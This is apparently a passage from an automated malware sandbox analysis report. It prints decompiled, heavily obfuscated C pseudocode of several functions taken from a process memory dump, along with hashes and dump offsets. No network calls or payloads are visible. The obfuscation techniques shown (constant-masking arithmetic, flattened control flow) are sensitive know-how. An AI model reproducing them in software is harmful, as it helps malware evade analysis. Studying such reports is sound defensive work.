                                                      				_v36 = 0xd568;
                                                      				_v36 = _v36 ^ 0xbcd770ac;
                                                      				_v36 = _v36 << 6;
                                                      				_v36 = _v36 << 8;
                                                      				_v36 = _v36 ^ 0xe97134d4;
                                                      				_v68 = 0xedd2;
                                                      				_t357 = 0x63;
                                                      				_v68 = _v68 * 0x5e;
                                                      				_v68 = _v68 + 0xde9c;
                                                      				_v68 = _v68 ^ 0x00587d35;
                                                      				_v32 = 0x24d4;
                                                      				_v32 = _v32 << 9;
                                                      				_v32 = _v32 ^ 0x2e569407;
                                                      				_v32 = _v32 << 0xf;
                                                      				_v32 = _v32 ^ 0x9e03fcb0;
                                                      				_v104 = 0x1c4d;
                                                      				_v104 = _v104 + 0xfffffff9;
                                                      				_v104 = _v104 ^ 0x00005633;
                                                      				_v40 = 0xb450;
                                                      				_v40 = _v40 + 0x94db;
                                                      				_v40 = _v40 | 0x3dcacfe3;
                                                      				_v40 = _v40 / _t357;
                                                      				_v40 = _v40 ^ 0x009f9709;
                                                      				_v100 = 0x6d07;
                                                      				_t358 = 0x45;
                                                      				_v100 = _v100 * 0x69;
                                                      				_v100 = _v100 ^ 0x002cf62e;
                                                      				_v72 = 0x5e87;
                                                      				_v72 = _v72 / _t358;
                                                      				_v72 = _v72 + 0xffff9f14;
                                                      				_v72 = _v72 ^ 0xffffe852;
                                                      				_v56 = 0x964f;
                                                      				_v56 = _v56 << 0xd;
                                                      				_v56 = _v56 + 0x58a7;
                                                      				_v56 = _v56 ^ 0x12ca7579;
                                                      				_v8 = 0x11e7;
                                                      				_t359 = 0x26;
                                                      				_v8 = _v8 * 0x7e;
                                                      				_v8 = _v8 << 7;
                                                      				_v8 = _v8 / _t359;
                                                      				_v8 = _v8 ^ 0x001dbdc0;
                                                      				_v52 = 0x5afe;
                                                      				_t360 = 0x23;
                                                      				_v52 = _v52 * 0x24;
                                                      				_v52 = _v52 / _t360;
                                                      				_v52 = _v52 ^ 0x00001a55;
                                                      				_v88 = 0xb83d;
                                                      				_v88 = _v88 >> 0xd;
                                                      				_v88 = _v88 ^ 0x00006413;
                                                      				_v20 = 0x5af3;
                                                      				_t361 = 0x3a;
                                                      				_v20 = _v20 * 0x6b;
                                                      				_v20 = _v20 + 0x6d49;
                                                      				_v20 = _v20 ^ 0x8eb5ed48;
                                                      				_v20 = _v20 ^ 0x8e93dded;
                                                      				_v16 = 0x70c;
                                                      				_v16 = _v16 / _t361;
                                                      				_v16 = _v16 + 0xffff5089;
                                                      				_v16 = _v16 | 0x770f0b4d;
                                                      				_v16 = _v16 ^ 0xffff12de;
                                                      				_v60 = 0xa79c;
                                                      				_v60 = _v60 | 0xbac1c5ec;
                                                      				_v60 = _v60 + 0x6b12;
                                                      				_v60 = _v60 ^ 0xbac228f9;
                                                      				_v12 = 0x5546;
                                                      				_v12 = _v12 << 0xc;
                                                      				_v12 = _v12 >> 0xd;
                                                      				_v12 = _v12 * 0x74;
                                                      				_v12 = _v12 ^ 0x001372eb;
                                                      				_v80 = 0x25db;
                                                      				_v80 = _v80 << 0xd;
                                                      				_v80 = _v80 << 3;
                                                      				_v80 = _v80 ^ 0x25db4552;
                                                      				_v44 = 0xe1b0;
                                                      				_v44 = _v44 + 0xffff2f0e;
                                                      				_v44 = _v44 | 0x46f5308b;
                                                      				_v44 = _v44 * 0x56;
                                                      				_v44 = _v44 ^ 0xd65e5bab;
                                                      				_v108 = 0x5856;
                                                      				_v108 = _v108 ^ 0x78cd5bef;
                                                      				_v108 = _v108 ^ 0x78cd26cd;
                                                      				_v76 = 0xfba5;
                                                      				_v76 = _v76 + 0xffff77ce;
                                                      				_t362 = 0x11;
                                                      				_v76 = _v76 / _t362;
                                                      				_v76 = _v76 ^ 0x00005641;
                                                      				_t314 = 2;
                                                      				do {
                                                      					while(_t315 != 0x1de3f48) {
                                                      						if(_t315 == 0x1f19b69e) {
                                                      							_t363 = E002378A5(_t315, _t315, 0x10, _t315, 4);
                                                      							E00237787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
                                                      							_t350 = _t348 + _t314;
                                                      							E00237787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
                                                      							_t365 = _t365 + 0x40;
                                                      							_t351 = _t350 + _t363 * 2;
                                                      							_t315 = 0x344e60d4;
                                                      							_t303 = 0x5c;
                                                      							 *_t351 = _t303;
                                                      							_t348 = _t351 + _t314;
                                                      							continue;
                                                      						} else {
                                                      							if(_t315 == 0x344e60d4) {
                                                      								_t364 = E002378A5(_t315, _t315, 0x10, _t315, 4);
                                                      								E00237787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
                                                      								_t365 = _t365 + 0x28;
                                                      								_t352 = _t348 + _t364 * 2;
                                                      								_t315 = 0x1de3f48;
                                                      								_t311 = 0x2e;
                                                      								 *_t352 = _t311;
                                                      								_t348 = _t352 + _t314;
                                                      								continue;
                                                      							} else {
                                                      								if(_t315 == 0x3a31b660) {
                                                      									_t311 = E00248C8F(_t315);
                                                      									_v112 = _t311;
                                                      									_t315 = 0x1f19b69e;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					E00237787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
                                                      					_t349 = _t348 + 6;
                                                      					_t365 = _t365 + 0x18;
                                                      					_t315 = 0x2228f3b5;
                                                      					 *_t349 = 0;
                                                      					_t348 = _t349 + _t314;
                                                      					L9:
                                                      				} while (_t315 != 0x2228f3b5);
                                                      				return _t311;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5}X
                                                      • API String ID: 0-583016468
                                                      • Opcode ID: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
                                                      • Instruction ID: 48f39576d59cc28e0cb94ab9f27c8200e0cde33933494a9c14db3c91316877e3
                                                      • Opcode Fuzzy Hash: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
                                                      • Instruction Fuzzy Hash: 4CD12271D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E512BA2A0D7B91A56CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E002362A3() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				intOrPtr _v88;
                                                      				char _v608;
                                                      				char _v1128;
                                                      				void* _t179;
                                                      				void* _t180;
                                                      				intOrPtr _t182;
                                                      				void* _t190;
                                                      				intOrPtr _t206;
                                                      				void* _t209;
                                                      				signed int _t210;
                                                      				signed int _t211;
                                                      				signed int _t212;
                                                      				void* _t214;
                                                      
                                                      				_v88 = 0xf2dad;
                                                      				_t209 = 0;
                                                      				_t190 = 0x374ac1da;
                                                      				_v84 = _v84 & 0;
                                                      				_v40 = 0xb12b;
                                                      				_v40 = _v40 << 0xe;
                                                      				_v40 = _v40 >> 0xf;
                                                      				_v40 = _v40 ^ 0x000058bc;
                                                      				_v60 = 0xf727;
                                                      				_t210 = 0x4f;
                                                      				_v60 = _v60 / _t210;
                                                      				_v60 = _v60 ^ 0x00007065;
                                                      				_v8 = 0x9eec;
                                                      				_v8 = _v8 + 0xd770;
                                                      				_v8 = _v8 >> 0xe;
                                                      				_v8 = _v8 >> 6;
                                                      				_v8 = _v8 ^ 0x00000fb6;
                                                      				_v44 = 0x7887;
                                                      				_v44 = _v44 << 5;
                                                      				_v44 = _v44 >> 0xc;
                                                      				_v44 = _v44 ^ 0x00001109;
                                                      				_v16 = 0xef0c;
                                                      				_t211 = 0x7a;
                                                      				_v16 = _v16 * 0x14;
                                                      				_v16 = _v16 ^ 0xca26cbdc;
                                                      				_v16 = _v16 | 0x7bdc5f23;
                                                      				_v16 = _v16 ^ 0xfbfc55fd;
                                                      				_v76 = 0xd8b4;
                                                      				_v76 = _v76 + 0x9c32;
                                                      				_v76 = _v76 ^ 0x00017966;
                                                      				_v36 = 0x1b76;
                                                      				_v36 = _v36 + 0x8638;
                                                      				_v36 = _v36 | 0x465c0394;
                                                      				_v36 = _v36 ^ 0x465cdef1;
                                                      				_v28 = 0xf8c7;
                                                      				_v28 = _v28 ^ 0x90f840f6;
                                                      				_v28 = _v28 / _t211;
                                                      				_v28 = _v28 ^ 0x01300a73;
                                                      				_v80 = 0x4878;
                                                      				_v80 = _v80 ^ 0xf33f81bb;
                                                      				_v80 = _v80 ^ 0xf33fed7c;
                                                      				_v12 = 0x5e32;
                                                      				_v12 = _v12 >> 5;
                                                      				_v12 = _v12 | 0xb939d170;
                                                      				_v12 = _v12 + 0xffffe46d;
                                                      				_v12 = _v12 ^ 0xb939c5f3;
                                                      				_v72 = 0xdcc7;
                                                      				_t212 = 5;
                                                      				_v72 = _v72 / _t212;
                                                      				_v72 = _v72 ^ 0x00000998;
                                                      				_v52 = 0xf409;
                                                      				_v52 = _v52 >> 7;
                                                      				_v52 = _v52 >> 2;
                                                      				_v52 = _v52 ^ 0x00002b61;
                                                      				_v20 = 0x5cd8;
                                                      				_v20 = _v20 + 0x5908;
                                                      				_v20 = _v20 * 0x1c;
                                                      				_v20 = _v20 * 0x14;
                                                      				_v20 = _v20 ^ 0x018d9ab8;
                                                      				_v32 = 0x162d;
                                                      				_v32 = _v32 + 0xffff1b5c;
                                                      				_v32 = _v32 >> 3;
                                                      				_v32 = _v32 ^ 0x1fff9926;
                                                      				_v64 = 0x95af;
                                                      				_v64 = _v64 + 0xffff7063;
                                                      				_v64 = _v64 ^ 0x00004670;
                                                      				_v56 = 0xeead;
                                                      				_v56 = _v56 + 0xffffd284;
                                                      				_v56 = _v56 ^ 0x94a6c65a;
                                                      				_v56 = _v56 ^ 0x94a662be;
                                                      				_v68 = 0xa18;
                                                      				_v68 = _v68 >> 0xa;
                                                      				_v68 = _v68 ^ 0x0000400d;
                                                      				_v48 = 0xd4d3;
                                                      				_v48 = _v48 * 3;
                                                      				_v48 = _v48 << 3;
                                                      				_v48 = _v48 ^ 0x0013dfa3;
                                                      				_v24 = 0x2d4a;
                                                      				_v24 = _v24 << 9;
                                                      				_v24 = _v24 + 0x17ff;
                                                      				_v24 = _v24 ^ 0x005aa30d;
                                                      				do {
                                                      					while(_t190 != 0x17ec002) {
                                                      						if(_t190 == 0x20702549) {
                                                      							_push(_v36);
                                                      							_t180 = E0024889D(0x24c930, _v76, __eflags);
                                                      							_t182 =  *0x24ca2c; // 0x698300
                                                      							_t206 =  *0x24ca2c; // 0x698300
                                                      							E002329E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
                                                      							E00242025(_v20, _t180, _v32, _v64);
                                                      							_t214 = _t214 + 0x30;
                                                      							_t190 = 0x17ec002;
                                                      							continue;
                                                      						} else {
                                                      							if(_t190 == 0x374ac1da) {
                                                      								_push(_t190);
                                                      								_push(_t190);
                                                      								E0023C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
                                                      								_t214 = _t214 + 0x1c;
                                                      								_t190 = 0x20702549;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L7;
                                                      					}
                                                      					_push(_t190);
                                                      					_push(_v24);
                                                      					_push(0);
                                                      					_push(_v48);
                                                      					_push(0);
                                                      					_push(_v68);
                                                      					_push( &_v1128);
                                                      					_t179 = E0023568E(_v56, 0);
                                                      					_t214 = _t214 + 0x1c;
                                                      					__eflags = _t179;
                                                      					_t209 = (_t179 != 0) ? 1 : _t209;
                                                      					_t190 = 0x3985ca2d;
                                                      					L7:
                                                      					__eflags = _t190 - 0x3985ca2d;
                                                      				} while (__eflags != 0);
                                                      				return _t209;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I%p
                                                      • API String ID: 0-3985577374
                                                      • Opcode ID: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
                                                      • Instruction ID: 405aef8c95797cb1f7e88075a49a34c9250c0f636685104075666483c38cc432
                                                      • Opcode Fuzzy Hash: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
                                                      • Instruction Fuzzy Hash: 368136B1D0021DABDF18CFE5D94A9DEBBB5FB44318F208059E112B62A0D7B80A09CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00240D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				unsigned int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				char _v48;
                                                      				void* _t128;
                                                      				signed int _t155;
                                                      				signed int _t156;
                                                      				signed int _t157;
                                                      				signed int _t158;
                                                      				void* _t173;
                                                      				signed int _t174;
                                                      
                                                      				_push(_a12);
                                                      				_t173 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t128);
                                                      				_v8 = 0x6813;
                                                      				_v8 = _v8 << 6;
                                                      				_v8 = _v8 ^ 0xf4e07894;
                                                      				_v8 = _v8 | 0x641e1778;
                                                      				_v8 = _v8 ^ 0xf4fe1535;
                                                      				_v16 = 0x7d9d;
                                                      				_t155 = 0x16;
                                                      				_v16 = _v16 * 0x4d;
                                                      				_v16 = _v16 ^ 0x0025b62f;
                                                      				_v32 = 0xbd8b;
                                                      				_v32 = _v32 ^ 0xdfb27dce;
                                                      				_v32 = _v32 / _t155;
                                                      				_v32 = _v32 ^ 0x0a2b09ce;
                                                      				_v28 = 0xad22;
                                                      				_t156 = 0x34;
                                                      				_v28 = _v28 * 0x47;
                                                      				_v28 = _v28 + 0x4161;
                                                      				_v28 = _v28 ^ 0x00307d44;
                                                      				_v36 = 0xa165;
                                                      				_v36 = _v36 >> 2;
                                                      				_v36 = _v36 ^ 0x00006be3;
                                                      				_v12 = 0xca43;
                                                      				_v12 = _v12 << 7;
                                                      				_v12 = _v12 + 0x4480;
                                                      				_v12 = _v12 >> 0x10;
                                                      				_v12 = _v12 ^ 0x00004998;
                                                      				_v44 = 0xc326;
                                                      				_v44 = _v44 / _t156;
                                                      				_v44 = _v44 ^ 0x000051cc;
                                                      				_v40 = 0xa768;
                                                      				_v40 = _v40 / _t156;
                                                      				_v40 = _v40 ^ 0x00002cdd;
                                                      				_v24 = 0x8f0;
                                                      				_v24 = _v24 << 2;
                                                      				_v24 = _v24 + 0xffff08f5;
                                                      				_v24 = _v24 | 0x28f06395;
                                                      				_v24 = _v24 ^ 0xffff76ac;
                                                      				_v20 = 0x26e;
                                                      				_v20 = _v20 + 0xffffc9ca;
                                                      				_v20 = _v20 + 0x3d88;
                                                      				_v20 = _v20 * 0x16;
                                                      				_v20 = _v20 ^ 0x00008c1f;
                                                      				_v48 = E00248C8F(_t156);
                                                      				_v8 = 0xba8c;
                                                      				_v8 = _v8 + 0xffff546f;
                                                      				_v8 = _v8 | 0xb28855c5;
                                                      				_v8 = _v8 ^ 0xa47da239;
                                                      				_v8 = _v8 ^ 0x16f5fdc2;
                                                      				_v16 = 0x4025;
                                                      				_t157 = 0xb;
                                                      				_v16 = _v16 / _t157;
                                                      				_v16 = _v16 + 0xffffba03;
                                                      				_t158 = 0x3b;
                                                      				_v16 = _v16 / _t158;
                                                      				_v16 = _v16 ^ 0x0456c691;
                                                      				_t174 = E002378A5(_t158, _t158, _v16, _t158, _v8);
                                                      				E00237787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
                                                      				 *((short*)(_t173 + _t174 * 2)) = 0;
                                                      				return 0;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D}0
                                                      • API String ID: 0-882559769
                                                      • Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                                      • Instruction ID: 3aabd78dde7f964da65a72716f7d4680d5e5eff9a6f5c417d18b436eebb78e11
                                                      • Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                                      • Instruction Fuzzy Hash: 6951F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44304F108199E111B6250D7B95B55CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E0024340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				char _v76;
                                                      				intOrPtr _v80;
                                                      				intOrPtr _v84;
                                                      				intOrPtr _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				void* _t88;
                                                      				void* _t94;
                                                      				void* _t100;
                                                      				void* _t102;
                                                      				intOrPtr _t117;
                                                      				signed int _t118;
                                                      				signed int* _t121;
                                                      
                                                      				_t116 = _a8;
                                                      				_t100 = __edx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t88);
                                                      				_v88 = 0x94797;
                                                      				_t117 = 0;
                                                      				_v84 = 0xfccb1;
                                                      				_t121 =  &(( &_v124)[4]);
                                                      				_v80 = 0;
                                                      				_v120 = 0xe518;
                                                      				_t102 = 0x2e39b5d1;
                                                      				_v120 = _v120 >> 0xf;
                                                      				_v120 = _v120 | 0x8d2dde7f;
                                                      				_v120 = _v120 ^ 0x46a7e325;
                                                      				_v120 = _v120 ^ 0xcb8a2201;
                                                      				_v124 = 0x16d5;
                                                      				_v124 = _v124 >> 0xe;
                                                      				_v124 = _v124 | 0x69fc1cf8;
                                                      				_t118 = 0x78;
                                                      				_v124 = _v124 * 0x21;
                                                      				_v124 = _v124 ^ 0xa97fd862;
                                                      				_v104 = 0xc3ad;
                                                      				_v104 = _v104 * 0x54;
                                                      				_v104 = _v104 ^ 0x00400d02;
                                                      				_v112 = 0x42c5;
                                                      				_v112 = _v112 ^ 0xf5e3cf1a;
                                                      				_v112 = _v112 ^ 0xb2e8281c;
                                                      				_v112 = _v112 | 0x1ecbfa7f;
                                                      				_v112 = _v112 ^ 0x5fcbcd35;
                                                      				_v96 = 0xbfa3;
                                                      				_v96 = _v96 ^ 0x0400a118;
                                                      				_v96 = _v96 ^ 0x04005591;
                                                      				_v116 = 0x719c;
                                                      				_v116 = _v116 / _t118;
                                                      				_v116 = _v116 << 3;
                                                      				_v116 = _v116 + 0xbb41;
                                                      				_v116 = _v116 ^ 0x0000fc42;
                                                      				_v100 = 0x8c7a;
                                                      				_v100 = _v100 << 3;
                                                      				_v100 = _v100 ^ 0x0004412d;
                                                      				_v92 = 0xd0f9;
                                                      				_v92 = _v92 + 0xffffb579;
                                                      				_v92 = _v92 ^ 0x0000a3c3;
                                                      				_v108 = 0x6440;
                                                      				_v108 = _v108 ^ 0x55818320;
                                                      				_v108 = _v108 << 0xf;
                                                      				_v108 = _v108 + 0x2c19;
                                                      				_v108 = _v108 ^ 0xf3b003dd;
                                                      				do {
                                                      					while(_t102 != 0x4681a3b) {
                                                      						if(_t102 == 0xbf6d415) {
                                                      							__eflags = E0023B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
                                                      							_t117 =  !=  ? 1 : _t117;
                                                      						} else {
                                                      							if(_t102 == 0x17b92136) {
                                                      								E002450F2( &_v76, _v120, _v124, _v104, _t100);
                                                      								_t121 =  &(_t121[3]);
                                                      								_t102 = 0x4681a3b;
                                                      								continue;
                                                      							} else {
                                                      								if(_t102 != 0x2e39b5d1) {
                                                      									goto L10;
                                                      								} else {
                                                      									_t102 = 0x17b92136;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L13:
                                                      						return _t117;
                                                      					}
                                                      					_t94 = E00248F11( &_v76, _v112, _v96, _t116, _v116, _v100);
                                                      					_t121 =  &(_t121[4]);
                                                      					__eflags = _t94;
                                                      					if(__eflags == 0) {
                                                      						_t102 = 0x114ebae0;
                                                      						goto L10;
                                                      					} else {
                                                      						_t102 = 0xbf6d415;
                                                      						continue;
                                                      					}
                                                      					goto L13;
                                                      					L10:
                                                      					__eflags = _t102 - 0x114ebae0;
                                                      				} while (__eflags != 0);
                                                      				goto L13;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @d
                                                      • API String ID: 0-4219467963
                                                      • Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                                      • Instruction ID: fb192e6da7435b10cd57d96b92fc4e8eabbe567b4dfe92bbea5047ee3f4add88
                                                      • Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                                      • Instruction Fuzzy Hash: E35177B11083429BD318CF21C84A81FFBF1BBD8748F504A1DF59A92160D7B5CA198F87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00243FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				char _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				void* _t80;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				void* _t98;
                                                      				void* _t114;
                                                      				void* _t115;
                                                      				void* _t117;
                                                      				void* _t118;
                                                      
                                                      				_push(_a8);
                                                      				_t114 = __ecx;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t80);
                                                      				_v96 = 0xd1bf;
                                                      				_t118 = _t117 + 0x10;
                                                      				_t115 = 0;
                                                      				_t98 = 0x349149b3;
                                                      				_t94 = 0x64;
                                                      				_v96 = _v96 / _t94;
                                                      				_v96 = _v96 ^ 0x00007874;
                                                      				_v104 = 0x2a01;
                                                      				_v104 = _v104 + 0x4d1a;
                                                      				_v104 = _v104 + 0xb0bd;
                                                      				_v104 = _v104 ^ 0x00017b91;
                                                      				_v108 = 0x44db;
                                                      				_v108 = _v108 + 0xffff0b38;
                                                      				_t95 = 0x1c;
                                                      				_v108 = _v108 * 7;
                                                      				_v108 = _v108 ^ 0xfffb0952;
                                                      				_v112 = 0x5707;
                                                      				_v112 = _v112 + 0x69dd;
                                                      				_v112 = _v112 + 0xef17;
                                                      				_v112 = _v112 | 0x7086095e;
                                                      				_v112 = _v112 ^ 0x7087ed58;
                                                      				_v92 = 0x8129;
                                                      				_v92 = _v92 >> 3;
                                                      				_v92 = _v92 ^ 0x00001eae;
                                                      				_v80 = 0x8f03;
                                                      				_v80 = _v80 ^ 0x5fd75a11;
                                                      				_v80 = _v80 ^ 0x5fd7f025;
                                                      				_v84 = 0x94fc;
                                                      				_v84 = _v84 >> 0x10;
                                                      				_v84 = _v84 ^ 0x00001c7c;
                                                      				_v100 = 0xd584;
                                                      				_v100 = _v100 >> 0xe;
                                                      				_v100 = _v100 / _t95;
                                                      				_v100 = _v100 ^ 0x00001ad3;
                                                      				_v88 = 0x35b5;
                                                      				_v88 = _v88 * 0x43;
                                                      				_v88 = _v88 ^ 0x000e607f;
                                                      				do {
                                                      					while(_t98 != 0x2d9dd110) {
                                                      						if(_t98 == 0x2e4dc862) {
                                                      							__eflags = E00248F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
                                                      							_t115 =  !=  ? 1 : _t115;
                                                      						} else {
                                                      							if(_t98 == 0x32f61d6a) {
                                                      								E002450F2( &_v76, _v96, _v104, _v108, _a8);
                                                      								_t118 = _t118 + 0xc;
                                                      								_t98 = 0x2d9dd110;
                                                      								continue;
                                                      							} else {
                                                      								if(_t98 != 0x349149b3) {
                                                      									goto L10;
                                                      								} else {
                                                      									_t98 = 0x32f61d6a;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L13:
                                                      						return _t115;
                                                      					}
                                                      					__eflags = E0023B055(_v112, _v92, __eflags,  &_v76, _t114);
                                                      					if(__eflags == 0) {
                                                      						_t98 = 0x5080212;
                                                      						goto L10;
                                                      					} else {
                                                      						_t98 = 0x2e4dc862;
                                                      						continue;
                                                      					}
                                                      					goto L13;
                                                      					L10:
                                                      					__eflags = _t98 - 0x5080212;
                                                      				} while (__eflags != 0);
                                                      				goto L13;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tx
                                                      • API String ID: 0-1414813443
                                                      • Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                                      • Instruction ID: a9d56f873395b612d6965ed42aed0979fa16b0c30ee6dc236b153e4e311f243a
                                                      • Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                                      • Instruction Fuzzy Hash: 6441A9715083429BE718DE20C88592FBBE1FBD8708F104A1DF5C9A62A0D7B5CA19CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E002360B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				void* _t104;
                                                      				void* _t109;
                                                      				signed int _t124;
                                                      				signed int _t125;
                                                      				signed int _t126;
                                                      				void* _t128;
                                                      
                                                      				_push(_a20);
                                                      				_t109 = __ecx;
                                                      				_t111 = _a16;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_v44 = 0x104;
                                                      				_push(0x104);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(0x104);
                                                      				_v8 = 0xaf29;
                                                      				_v8 = _v8 >> 0xe;
                                                      				_t128 = 0;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x0000662d;
                                                      				_v20 = 0xac55;
                                                      				_v20 = _v20 | 0x2323cee5;
                                                      				_t124 = 0x4c;
                                                      				_v20 = _v20 / _t124;
                                                      				_v20 = _v20 ^ 0x007629b6;
                                                      				_v16 = 0xabf2;
                                                      				_v16 = _v16 | 0x220f7c85;
                                                      				_v16 = _v16 + 0xffff7509;
                                                      				_v16 = _v16 ^ 0x220f51b4;
                                                      				_v40 = 0x3232;
                                                      				_t125 = 0x1f;
                                                      				_v40 = _v40 / _t125;
                                                      				_v40 = _v40 ^ 0x00004228;
                                                      				_v36 = 0x2ec1;
                                                      				_v36 = _v36 | 0xae4e7a63;
                                                      				_v36 = _v36 ^ 0xae4e526e;
                                                      				_v12 = 0xa12f;
                                                      				_v12 = _v12 << 0xe;
                                                      				_v12 = _v12 << 0xb;
                                                      				_v12 = _v12 << 0x10;
                                                      				_v12 = _v12 ^ 0x00007580;
                                                      				_v32 = 0xadd8;
                                                      				_v32 = _v32 | 0x6e6f3325;
                                                      				_v32 = _v32 ^ 0x5adaef9e;
                                                      				_v32 = _v32 ^ 0x34b54fa4;
                                                      				_v28 = 0xb293;
                                                      				_t126 = 0x3b;
                                                      				_v28 = _v28 * 0x2d;
                                                      				_v28 = _v28 << 0xb;
